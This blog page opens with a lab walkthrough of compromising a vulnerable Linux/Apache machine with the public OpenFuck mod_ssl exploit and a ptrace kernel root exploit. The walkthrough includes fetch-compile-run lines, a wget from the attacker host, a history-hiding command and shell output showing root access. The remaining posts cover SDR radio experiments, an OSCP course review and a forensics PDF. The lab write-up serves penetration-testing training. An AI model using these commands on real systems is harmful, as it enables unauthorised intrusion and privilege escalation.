It was really promising, and an SSL service was running as well. After downloading it, I had to add two lines to the exploit code to get it to compile, and I commented out a command which was not needed:

#include <openssl/rc4.h>
#include <openssl/md5.h> 

// wget http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"


Once it compiled, I searched for the version I needed and ran it (we know the Apache version, and that the Linux is Red Hat), and voilà... I got a reverse shell with limited privileges.

root@kali:~# ./OpenFuck | grep 1.3.20
    0x02 - Cobalt Sun 6.0 (apache-1.3.20)
    0x27 - FreeBSD (apache-1.3.20)
    0x28 - FreeBSD (apache-1.3.20)
    0x29 - FreeBSD (apache-1.3.20+2.8.4)
    0x2a - FreeBSD (apache-1.3.20_1)
    0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
    0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
    0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
    0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
    0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
    0x7e - Slackware Linux 8.0 (apache-1.3.20)
    0x86 - SuSE Linux 7.3 (apache-1.3.20)

root@kali:~# ./OpenFuck 0x6b 192.168.1.104


*******************************************************************

* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection

cipher: 0x4043808c   ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ unset HISTFILE; cd /tmp;
bash-2.05$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-2.05$ uname -r
uname -r
2.4.7-10


Now I only need to get root. The original exploit wanted to download a ptrace exploit. After checking the Linux kernel version, I could see that it could work, so I downloaded the code and compiled it.

Linux Kernel 2.2.x - 2.4.x ptrace/kmod Local Root Exploit
http://www.exploit-db.com/exploits/3/

I had to modify one line in the exploit to get it to work:

#include <linux/user.h>
to
#include <sys/user.h>

I copied it to my Apache directory and then fetched it on the victim machine with wget. After running it, I got root!

bash-2.05$ wget 192.168.1.17/p
wget 192.168.1.17/p
--15:42:35--  http://192.168.1.17/p
           => `p'
Connecting to 192.168.1.17:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 9,210

    0K ........                                              100% @ 691.86 KB/s


15:42:35 (691.86 KB/s) - `p' saved [9210/9210]


bash-2.05$ ls -l

ls -l
total 9
-rw-r--r--    1 apache   apache       9210 Nov  2 14:40 p
bash-2.05$ chmod 777 p
chmod 777 p

bash-2.05$ ./p

./p
[+] Attached to 5990
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...

id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
cd /root
ls -l
total 2
-rw-r--r--    1 root     root         1303 Sep 26  2009 anaconda-ks.cfg


This is only my way of doing it; as this is the entry level, there could be other ways to get in.

SDR with Kali: gqrx

gqrx is a software defined radio receiver for Linux. It offers the following features:

  • Discover devices attached to the computer.
  • Process I/Q data from the supported devices.
  • Change frequency, gain and apply various corrections (frequency, I/Q balance).
  • AM, SSB, FM-N and FM-W (mono and stereo) demodulators.
  • Special FM mode for NOAA APT.
  • Variable band pass filter.
  • AGC, squelch and noise blankers.
  • FFT plot and waterfall.
  • Record and playback audio to / from WAV file.
  • Spectrum analyzer mode where all signal processing is disabled.

I tried it for listening to FM radio again, similar to the tool I used on Windows. We can start it from the command line with "gqrx" or by selecting it from the menu.


I tuned to one of the local radio stations, and it plays fine.


I'm not a radio amateur, so I'm just experimenting so far. This is a very good blog for SDR:

http://www.rtl-sdr.com/

Tuesday, October 29, 2013

Software Defined Radio

Recently I bought a small USB receiver to play with SDR:
Terratec DVB-T USB Receiver - Realtek RTL2832U + Elonics E4000-Based

I want to experiment with what you can do with this technology, and explore how Kali Linux supports it and what tools are available there.
Update 2013/11/11 - I won't have time in the near future, but it's on the long-term plan for this year.

But first I set it up on Windows; here is a nice article on how to do it:

After setting up, it works nicely, and I can listen to FM radio :) Here is a screenshot from SDR Sharp:


Wednesday, May 29, 2013

Review: Penetration Testing with Backtrack (PWB) / Offensive Security Certified Professional (OSCP)

I recently took the PWB course, and finally passed the OSCP exam (and I'm very happy now :))))))), that's why I was quiet for a long time.

This was one of the best trainings and certifications I have ever taken. I knew before I started that it would be very hard and time consuming, but it was even more than I expected. First, I’m not really experienced in this subject; I did the EC-Council’s CEH course before this, but that was mainly theory and very little practice. Having a C|EH did help, as the whole stuff was familiar (in theory!), and I didn’t need to start from scratch.

The training itself starts with receiving the roughly 350-page study material (lab guide) and about 7 hours of video. These cover all the basics you need for the later lab exercises. They start with how to set up services in BT (Backtrack), what port scanning is and how to do it, various service enumeration, and information gathering in general. Then it moves on to writing buffer overflow exploits, going through all the steps in a very detailed manner. After that they teach you how to work with public exploits and the basics of the Metasploit framework, and there are two client-side exploit case studies as well. The next big subject is transferring files between machines (there are some really tricky ones), tunneling, pivoting, and password attacks. Finally they cover the basics of SQL injection and XSS attacks. There are a few other smaller topics, but they are not really part of the later exercises. There are quite a few exercises for each module to practice the techniques, all of which have to be documented and sent along with the exam report at the end, but I will talk about that later.

The big part is the remote lab. There is a big network with about 50 machines, which tries to simulate an existing organization. There are firewalls, proxy servers, machines communicating with each other, so it’s pretty good. The big goal here is to attack all the machines and get root / admin access to all of them (or as many as you can/want to). I managed to own 46 machines. There are some very easy ones, and there are some which are really hard to get. My last and most difficult was “sufference” (you can guess why the name is…), where I spent about 20-30 hours to get root on it; it was very, very tricky and painful (oh, there is another box called “pain”, guess why :)). The training material teaches you the basics, but you will have to go and learn a lot on your own, read about various services, OSes, applications, and so on, because they just can’t cover everything, and this is really not the goal there; the goal is to teach you to adapt and solve unknown problems, as you would face in real life. Will you spend hours trying to exploit patched services, or other stuff, which won’t work? YES! Will you do it over and over again? YES! Will you hit your head on the desk when you finally realize how to get in somewhere, and how stupid you were not to see the forest for the trees? Probably YES! :) All of this is part of the fun :) You can chat with the Offsec guys on IRC, but never expect them to give you a solution to any of the machines; if you go to them with a specific question, they may give you a hint, but that’s the maximum you can expect. Will you feel many times that you just can’t exploit a machine? YES! Will you get in later? Hopefully YES! I think their “Try Harder!” philosophy really works. Remember that all the machines are exploitable, and they are there to be exploited.
All the boxes are different and almost all of them can be owned by a different technique, so you can practice every type of attack: normal exploits, SQL injection, XSS attacks, client-side exploits and so on. There are 4 networks in the lab separated by firewalls and proxy servers, as you would have in real life. You can practice various tunneling techniques there, hopping from one machine to the next during exploitation. I think if you are not a pentester, then you should get all of the machines in the lab to get the most out of the course. The lab time can be purchased for 30, 60 and 90 days, but if you feel it’s too short, you can always extend it, as I did (I went for 90 days + 30 days extension). I did the training after work and on weekends, and I’m just lucky that my wife didn’t kill me for that :)

The exam. Obviously I can’t share details about it, but it’s a 24-hour-long challenge, where you get access to another small network with a few machines, and similarly to the lab you need to get admin / root access on them. I really liked it; finally an exam which is not simply a list of multiple choice questions, but where you really need to demonstrate your skills in practice, in a previously unknown environment (like the Cisco CCIE). This is why it’s important to own all machines in the lab, to get prepared for the challenge and face as many different systems as you can. Obviously you can use everything, as you could in real-world pentesting, but don’t expect the exam to be easy because of that. It’s hard. I started at 4PM (GMT+1) and progressed quite well, and at 1AM I already had enough points that I knew I would pass. So I went for 6 hours of sleep, continued at 8AM, and quickly got my next machine. I decided to have a shower and breakfast then, and after that, in another hour, I completed everything. With that said, it’s very important to take frequent breaks during the exam, as they can make a huge difference; go and breathe some fresh air, your brain really needs oxygen :). I also prepared a list of commands I found very useful during the lab time, which became very handy during the exam.

The last part is to write the penetration test report about the exam, along with your recommendations on how to fix the holes you have found. You have another 24 hours for that after the exam ends, so take notes, screenshots, etc. You need to write the same kind of report for the lab network penetration test and for the additional exercises you did during the training.

You get the results in 3 business days, but for me it was much quicker.

Overall I really enjoyed both the training and the exam, and I can’t say how much I learned about this subject during the last 4 months. It’s really worth its price, and much cheaper than any other similar training; you just need a lot of time, and even more time (I spent about 160-200 hours practicing in the lab after work and on weekends) – and most importantly a wife / girlfriend / family who will support you and understand that you are not always available during this period :)

Links:

Friday, March 1, 2013

Computer Forensic Investigation w/ Backtrack

I took all my forensics-related blog entries and created a single document from them, which can be downloaded from here:

Computer Forensic Investigation with Backtrack.pdf

I hope you will enjoy it.